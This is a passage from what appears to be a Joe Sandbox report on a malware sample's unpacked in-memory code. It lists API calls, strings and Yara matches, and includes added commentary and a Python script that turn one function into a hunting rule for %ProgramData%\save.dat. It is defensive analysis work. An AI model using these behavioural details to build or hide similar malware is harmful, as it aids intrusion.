• GetLastError.KERNEL32(?,00000000), ref: 02C21FD2
  • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
Similarity
• API ID: H_prolog$CompletionCreateErrorLastPort
• String ID: iocp
APIs
• _malloc.LIBCMT ref: 02C33564
  • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
  • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
  • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
• std::exception::exception.LIBCMT ref: 02C33582
• __CxxThrowException@8.LIBCMT ref: 02C33597
  • Part of subcall function 02C33F5A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C3359C,?,02C50F6C,00000000,00000001), ref: 02C33FAF
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
• String ID: bad allocation
APIs
• __EH_prolog.LIBCMT ref: 02C237B6
• __localtime64.LIBCMT ref: 02C237C1
  • Part of subcall function 02C32000: __gmtime64_s.LIBCMT ref: 02C32013
• std::exception::exception.LIBCMT ref: 02C237D9
  • Part of subcall function 02C31ED3: std::exception::_Copy_str.LIBCMT ref: 02C31EEC
  • Part of subcall function 02C29EB1: __EH_prolog.LIBCMT ref: 02C29EB6
  • Part of subcall function 02C29EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29EC5
  • Part of subcall function 02C29EB1: __CxxThrowException@8.LIBCMT ref: 02C29EE4
Strings
• could not convert calendar time to UTC time, xrefs: 02C237CE
Similarity
• API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
• String ID: could not convert calendar time to UTC time
APIs
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30DBF
  • Part of subcall function 02C23FDC: __EH_prolog.LIBCMT ref: 02C23FE1
  • Part of subcall function 02C23FDC: CreateEventA.KERNEL32(00000000,02C2A5C3,?,00000000), ref: 02C23FF3
• CloseHandle.KERNEL32(00000000), ref: 02C30DB4
• CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30E00
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30ED1
Similarity
• API ID: CloseHandle$Event$CreateH_prolog
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C3F94B
• __isleadbyte_l.LIBCMT ref: 02C3F979
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9A7
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9DD
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
APIs
• _malloc.LIBCMT ref: 02C3FDB0
  • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
  • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
  • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
Similarity
• API ID: AllocateHeap_malloc
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C31D92
• ___ascii_stricmp.LIBCMT ref: 02C31DCA
• __tolower_l.LIBCMT ref: 02C31DE0
  • Part of subcall function 02C3537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C35388
  • Part of subcall function 02C3537A: __isctype_l.LIBCMT ref: 02C353A9
• __tolower_l.LIBCMT ref: 02C31DEF
Similarity
• API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
APIs
• htons.WS2_32(?), ref: 02C23DA2
  • Part of subcall function 02C23BD3: __EH_prolog.LIBCMT ref: 02C23BD8
  • Part of subcall function 02C23BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
• htonl.WS2_32(00000000), ref: 02C23DB9
• htonl.WS2_32(00000000), ref: 02C23DC0
• htons.WS2_32(?), ref: 02C23DD4
Similarity
• API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02C2335F,?,?,?,?,?), ref: 02C223D0
• RtlEnterCriticalSection.NTDLL(?), ref: 02C223DE
• InterlockedExchange.KERNEL32(00000030,00000001), ref: 02C22401
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C22408
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C224A9
• RtlEnterCriticalSection.NTDLL(?), ref: 02C224B8
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C224CD
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C224D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 4018804020-0
                                                                              • Opcode ID: 6bfba2d9a72ba1a675494804b5a7e22132e1645977a83d0452afd86160416763
                                                                              • Instruction ID: 2c712061f75e2d56f0dd99a6e7a1347c46fa17e2d0b7f228860a23b1bb6ca748
                                                                              • Opcode Fuzzy Hash: 6bfba2d9a72ba1a675494804b5a7e22132e1645977a83d0452afd86160416763
                                                                              • Instruction Fuzzy Hash: 63F03C76641204AFDB00AFA5EC84B9BBBACFF44710F004515FA04C6141D771E6688FE1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C22009
                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 02C22028
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C22037
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C2204E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                              • String ID:
                                                                              • API String ID: 2456309408-0
                                                                              • Opcode ID: 9bcba0b7647c9a63e0b5b82cae636bb43d55d8937e0c2599fd6729d8678bed68
                                                                              • Instruction ID: 04ef1908c5a5e8d0521d73af8344c0e8db74d08274941afe2c4b7c3c0ad40fff
                                                                              • Opcode Fuzzy Hash: 9bcba0b7647c9a63e0b5b82cae636bb43d55d8937e0c2599fd6729d8678bed68
                                                                              • Instruction Fuzzy Hash: AE01DC714406249BC739AF54E808B9BFBF4EF04709F004A1DE84692990CF74A64CCF91
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$H_prologSleep
                                                                              • String ID:
                                                                              • API String ID: 1765829285-0
                                                                              • Opcode ID: 71cf3abfb4180e76550b005450bc0952b7e7347d43cc1e9625048a577f8655df
                                                                              • Instruction ID: 9d223dc0874c33b33f6796a276d7938748e36e729afc4edd8c179e5a92c70e25
                                                                              • Opcode Fuzzy Hash: 71cf3abfb4180e76550b005450bc0952b7e7347d43cc1e9625048a577f8655df
                                                                              • Instruction Fuzzy Hash: 47F05435A41110EFCB109F94D8C8B8DBBA4FF0D311F1082A9F619DB290CB359854CB91
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C27D5C,?,?,00000000), ref: 02C29059
                                                                              • getsockname.WS2_32(?,?,?), ref: 02C2906F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastgetsockname
                                                                              • String ID: &'
                                                                              • API String ID: 566540725-655172784
                                                                              • Opcode ID: de4acd66ebda279131894242fc7f6397a790257c466de96afc6a817cf972c0b2
                                                                              • Instruction ID: e4cc6e97e0d165e3b39c3ef1155f11a3fb78213b4fe09c111ff851a7fe76659a
                                                                              • Opcode Fuzzy Hash: de4acd66ebda279131894242fc7f6397a790257c466de96afc6a817cf972c0b2
                                                                              • Instruction Fuzzy Hash: 55219276A00218DFDB10DF68D844ACEB7F5FF4C310F20856AE918EB281EB30E9458B94
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2C63D
                                                                                • Part of subcall function 02C2CC19: std::exception::exception.LIBCMT ref: 02C2CC48
                                                                                • Part of subcall function 02C2D3D2: __EH_prolog.LIBCMT ref: 02C2D3D7
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                                • Part of subcall function 02C2CC78: __EH_prolog.LIBCMT ref: 02C2CC7D
                                                                              Strings
                                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C67A
                                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C2C673
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                              • API String ID: 1953324306-1943798000
                                                                              • Opcode ID: 9aa9b2d8fb7d3d592913aa1f7fbf1036d9da7ae5dffceee9b9c3bb44c528c05c
                                                                              • Instruction ID: bbfade04acca29e4d2e0dfea8b3ce2859c3c84cfc8d19d8de9a54ffecc81521b
                                                                              • Opcode Fuzzy Hash: 9aa9b2d8fb7d3d592913aa1f7fbf1036d9da7ae5dffceee9b9c3bb44c528c05c
                                                                              • Instruction Fuzzy Hash: F82191B1E002689BDB08EFE8D954BAEBBB5EF54704F00055EE806BB240DF749A48DF50
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2C732
                                                                                • Part of subcall function 02C2CCF0: std::exception::exception.LIBCMT ref: 02C2CD1D
                                                                                • Part of subcall function 02C2D509: __EH_prolog.LIBCMT ref: 02C2D50E
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                                • Part of subcall function 02C2CD4D: __EH_prolog.LIBCMT ref: 02C2CD52
                                                                              Strings
                                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C2C768
                                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C2C76F
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                              • API String ID: 1953324306-412195191
                                                                              • Opcode ID: 11b9ac1bba84525417b71deab8cc21985a9ace874d9255cbe0134a19746d5730
                                                                              • Instruction ID: fd51077d90fe55998c155796d81b0b8e726118ed54449f3250894db5918fec4a
                                                                              • Opcode Fuzzy Hash: 11b9ac1bba84525417b71deab8cc21985a9ace874d9255cbe0134a19746d5730
                                                                              • Instruction Fuzzy Hash: 4E21BFB1E002689BDB18EFE8D544BEEBBB5EF54704F00055EE806AB240DF749A48DF90
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 02C25288
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C275B2), ref: 02C2529A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                              • String ID: \save.dat
                                                                              • API String ID: 4128168839-3580179773
                                                                              • Opcode ID: ba15e872e7b87b447a493eb3cb403ef67b3f4e03a1ece4b588ab8bd03916e2a3
                                                                              • Instruction ID: 2fe676f6c71f5e235a4936563705885eb2f1f191f8643ab9cec906c93a981d2d
                                                                              • Opcode Fuzzy Hash: ba15e872e7b87b447a493eb3cb403ef67b3f4e03a1ece4b588ab8bd03916e2a3
                                                                              • Instruction Fuzzy Hash: 2E1194329043512BDB269E648C80E6FFF67DFC169071406ECEC4567102DE731D06C5E0
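The function above is the one worth pulling a host indicator from: it calls SHGetSpecialFolderPathA with CSIDL 0x23 (CSIDL_COMMON_APPDATA, the folder behind %ProgramData% on Windows Vista and later) and fCreate = 0, then appends the literal \save.dat, so the file to look for is %ProgramData%\save.dat. Note where this code comes from: the dump name's protection/state/type fields (00000040, 00001000, 00020000) are the Win32 values PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE, and the report marks it "based on PE: false", so these functions were recovered from a private, non-image RWX region, i.e. from the unpacked payload in memory, which a scan of the file on disk will not see. The Python below is an added example for this page, not Joe Sandbox or sample code: it parses the report's API reference lines, decodes the CSIDL argument into a host-neutral hunting path, and runs that path against a few constructed file-event paths. The CSIDL table and default folder locations come from the Windows SDK; the '$' separator for multiple strings is how this report joins them at other functions (see the boost entries below); the sample file events are constructed.

```python
"""Turn Joe Sandbox function-analysis lines into a host-hunting artifact.

Added example for this report page, not Joe Sandbox or sample code.
The API/String ID lines below are copied from the function block above;
the file-event paths are constructed test data.
"""
import re
from typing import Optional

# One API reference line of the report, with or without arguments, e.g.
#   • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02C2529A
API_LINE = re.compile(
    r"(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<module>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# The report joins several strings of one function with '$' in 'String ID:'
STRING_ID = re.compile(r"String ID:\s*(?P<s>.+)")

# CSIDL values (shlobj.h) and their default location on Windows Vista and
# later, written with environment variables so the result is host-neutral.
CSIDL = {
    0x07: ("CSIDL_STARTUP", r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"),
    0x18: ("CSIDL_COMMON_STARTUP", r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"),
    0x1A: ("CSIDL_APPDATA", r"%APPDATA%"),
    0x1C: ("CSIDL_LOCAL_APPDATA", r"%LOCALAPPDATA%"),
    0x23: ("CSIDL_COMMON_APPDATA", r"%ProgramData%"),
}
# Regex fragments for those variables (default paths, any drive letter, any user).
ENV_RE = {
    "%APPDATA%": r"[a-z]:\\users\\[^\\]+\\appdata\\roaming",
    "%LOCALAPPDATA%": r"[a-z]:\\users\\[^\\]+\\appdata\\local",
    "%ProgramData%": r"[a-z]:\\programdata",
}


def parse_api_line(line: str) -> Optional[dict]:
    """Split one 'Api.MODULE(args), ref: addr' line into its fields."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    # '?' marks an argument the sandbox could not resolve; keep it as None
    args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None for a in raw]
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": m.group("ref"), "subcall": bool(m.group("sub"))}


def block_strings(block: str) -> list:
    """Strings the report attributes to the function (its 'String ID:' line)."""
    m = STRING_ID.search(block)
    return [s for s in m.group("s").split("$") if s] if m else []


def expected_artifact(block: str) -> Optional[dict]:
    """Path built from a direct SHGetSpecialFolderPathA/W call (CSIDL = 3rd arg,
    fCreate = 4th arg) plus the function's first string that starts with '\\'."""
    calls = [c for c in map(parse_api_line, block.splitlines()) if c]
    folder = next((c for c in calls if c["api"].startswith("SHGetSpecialFolderPath")
                   and not c["subcall"]), None)
    if folder is None or len(folder["args"]) < 4 or folder["args"][2] is None:
        return None
    csidl = folder["args"][2]
    name, base = CSIDL.get(csidl, ("CSIDL_0x%04X" % csidl, None))
    tail = next((s for s in block_strings(block) if s.startswith("\\")), "")
    return {"csidl": name, "create_if_missing": bool(folder["args"][3]),
            "path": base + tail if base else None}


def compile_hunt(pattern: str) -> "re.Pattern":
    """Turn e.g. '%ProgramData%\\save.dat' into a case-insensitive full-path regex."""
    out = re.escape(pattern)
    for var, frag in ENV_RE.items():
        out = out.replace(re.escape(var), frag)
    return re.compile("^" + out + "$", re.IGNORECASE)


def hunt(pattern: str, file_paths: list) -> list:
    """Return the file-event paths that match the artifact pattern."""
    rx = compile_hunt(pattern)
    return [p for p in file_paths if rx.match(p)]


# Lines copied from the report block above (this function's API and String ID lines).
SAVE_DAT_BLOCK = r"""
• _malloc.LIBCMT ref: 02C25288
  • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02C275B2), ref: 02C2529A
• String ID: \save.dat
"""
# Constructed file-creation events, not from the report.
SAMPLE_FILE_EVENTS = [
    r"C:\ProgramData\save.dat",
    r"D:\programdata\SAVE.DAT",
    r"C:\Users\alice\AppData\Roaming\save.dat",
    r"C:\ProgramData\Microsoft\save.dat",
]

if __name__ == "__main__":
    art = expected_artifact(SAVE_DAT_BLOCK)
    print(art)                                    # CSIDL_COMMON_APPDATA -> %ProgramData%\save.dat
    print(hunt(art["path"], SAMPLE_FILE_EVENTS))  # the first two constructed events
```

The matcher deliberately anchors the whole path and tolerates drive letter and case, but not extra directory components, so %ProgramData%\Microsoft\save.dat is not a hit; widen ENV_RE or the pattern if the environment relocates ProgramData.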
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2396A
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C239C1
                                                                                • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                                • Part of subcall function 02C29FA7: __EH_prolog.LIBCMT ref: 02C29FAC
                                                                                • Part of subcall function 02C29FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29FBB
                                                                                • Part of subcall function 02C29FA7: __CxxThrowException@8.LIBCMT ref: 02C29FDA
                                                                              Strings
                                                                              • Day of month is not valid for year, xrefs: 02C239AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Day of month is not valid for year
                                                                              • API String ID: 1404951899-1521898139
                                                                              • Opcode ID: f4faaea5081b150041d41a75d65a57285fd23f70875a7ac7c369ee7999bbfc80
                                                                              • Instruction ID: ac08278c3adaf43db99c59d93442eb3826c473c71810b0c02785344545c96b61
                                                                              • Opcode Fuzzy Hash: f4faaea5081b150041d41a75d65a57285fd23f70875a7ac7c369ee7999bbfc80
                                                                              • Instruction Fuzzy Hash: 5101B17A910259AADF04EFA8D841AEFB779FF18710F10401AEC04A3200EF704A49DB95
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 02C2F510
                                                                              • __CxxThrowException@8.LIBCMT ref: 02C2F525
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 4063778783-2104205924
                                                                              • Opcode ID: 1e8d4cbd3536c9c3af2fd88eb5ccbc750393a2f49b36f589ac91352955ff844b
                                                                              • Instruction ID: 942564b7743e1005540b665ebfa1b74ddb49222d420eddd3f91ac2d2e0e3d5fe
                                                                              • Opcode Fuzzy Hash: 1e8d4cbd3536c9c3af2fd88eb5ccbc750393a2f49b36f589ac91352955ff844b
                                                                              • Instruction Fuzzy Hash: D2F02EB064031DA7EF04E6A889149BF73FC9F04300B400AA5E415D3180EF71E7088994
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C23C1B
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02C23C30
                                                                                • Part of subcall function 02C31EB7: std::exception::exception.LIBCMT ref: 02C31EC1
                                                                                • Part of subcall function 02C29FE0: __EH_prolog.LIBCMT ref: 02C29FE5
                                                                                • Part of subcall function 02C29FE0: __CxxThrowException@8.LIBCMT ref: 02C2A00E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID: bad cast
                                                                              • API String ID: 1300498068-3145022300
                                                                              • Opcode ID: 180a879f869caa01f9ae61d1dd7fb145a98d95c41efefea4369c4360fb68c0a9
                                                                              • Instruction ID: efbbe6a3b51a7a43620c062f3c1da0f71a35edaf34cf6cf46f791b05db5c51af
                                                                              • Opcode Fuzzy Hash: 180a879f869caa01f9ae61d1dd7fb145a98d95c41efefea4369c4360fb68c0a9
                                                                              • Instruction Fuzzy Hash: 43F0A072A005048BC719EF58D440AEBB776EF62315F1041AEED065B340CFB29A4BDAD1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C238D2
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C238F1
                                                                                • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                              Strings
                                                                              • Year is out of valid range: 1400..10000, xrefs: 02C238E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Year is out of valid range: 1400..10000
                                                                              • API String ID: 2067857976-2344417016
                                                                              • Opcode ID: 2a6bf31e4f21512898ee70786c72a30016efcebb71b05979b2ac3d20265f8ef4
                                                                              • Instruction ID: 7242bd8f0e85f8ab4e22ced8d18f5d37751407ab98a54cba44134e73691219bf
                                                                              • Opcode Fuzzy Hash: 2a6bf31e4f21512898ee70786c72a30016efcebb71b05979b2ac3d20265f8ef4
                                                                              • Instruction Fuzzy Hash: 07E0D8B2A4011457DB28FB98CC117EEB7B9DB08750F00015AE80563280DFB12948DB90
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C23886
                                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C238A5
                                                                                • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
                                                                              Strings
                                                                              • Day of month value is out of range 1..31, xrefs: 02C23894
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                              • String ID: Day of month value is out of range 1..31
                                                                              • API String ID: 2067857976-1361117730
• Opcode ID: ef96fbd73e648332c867eb20f335eadca2a5d4e7cfe1eb30ac2ce4bc8e5fd4c8
• Instruction ID: cf625cad5deb1777640526be1ab3ea720568e6281cd40503a6394c67c51e8ad4
• Opcode Fuzzy Hash: ef96fbd73e648332c867eb20f335eadca2a5d4e7cfe1eb30ac2ce4bc8e5fd4c8
• Instruction Fuzzy Hash: C8E0D8B2A4011497EB24FB98CC517EEB7B9DB08720F00055AE80573280DFB12948DB90
APIs
• __EH_prolog.LIBCMT ref: 02C2391E
• std::runtime_error::runtime_error.LIBCPMT ref: 02C2393D
  • Part of subcall function 02C21410: std::exception::exception.LIBCMT ref: 02C21428
Strings
• Month number is out of range 1..12, xrefs: 02C2392C
Memory Dump Source
• Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Month number is out of range 1..12
• API String ID: 2067857976-4198407886
• Opcode ID: 12fec39efcd8291e10ac827f2898cde58a07416ae53974af378d7f4702380f3d
• Instruction ID: 6def07d69d82ea1b33d58cebe107499316a99e8ed99999682cd46f5ca4cc3205
• Opcode Fuzzy Hash: 12fec39efcd8291e10ac827f2898cde58a07416ae53974af378d7f4702380f3d
• Instruction Fuzzy Hash: 44E0D8B2B4022457D724FB98CC117EEB779DB08750F00015AE40563680DFB12948DBD1
APIs
• TlsAlloc.KERNEL32 ref: 02C219CC
• GetLastError.KERNEL32 ref: 02C219D9
  • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
Strings
Memory Dump Source
• Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
Yara matches
Similarity
• API ID: AllocErrorH_prologLast
• String ID: tss
• API String ID: 249634027-1638339373
• Opcode ID: d74c2c4a06143dbf214ce1846d25a4d3140567e1ded45b49183cffa458d6e825
• Instruction ID: 55b531c7420cf71d8db5993b97f51270f68f005a5a5ff9bb0b21de1d19aeb087
• Opcode Fuzzy Hash: d74c2c4a06143dbf214ce1846d25a4d3140567e1ded45b49183cffa458d6e825
• Instruction Fuzzy Hash: 86E08676D052245BC3107B78980808BBBD49A84230F104B66ECAD832D1FF7199589FC6
APIs
• __EH_prolog.LIBCMT ref: 02C23BD8
• std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
  • Part of subcall function 02C31EB7: std::exception::exception.LIBCMT ref: 02C31EC1
  • Part of subcall function 02C29FE0: __EH_prolog.LIBCMT ref: 02C29FE5
  • Part of subcall function 02C29FE0: __CxxThrowException@8.LIBCMT ref: 02C2A00E
Strings
Memory Dump Source
• Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: bad cast
• API String ID: 1300498068-3145022300
• Opcode ID: 38567bb5c1c9ff92609438c0d2d4a3a0e13204bdf698fc136a951b373fddf6d2
• Instruction ID: 65338436fa0ba3e001f3aab3ece1deef6a7739c2ac5778742409ee05313a55d0
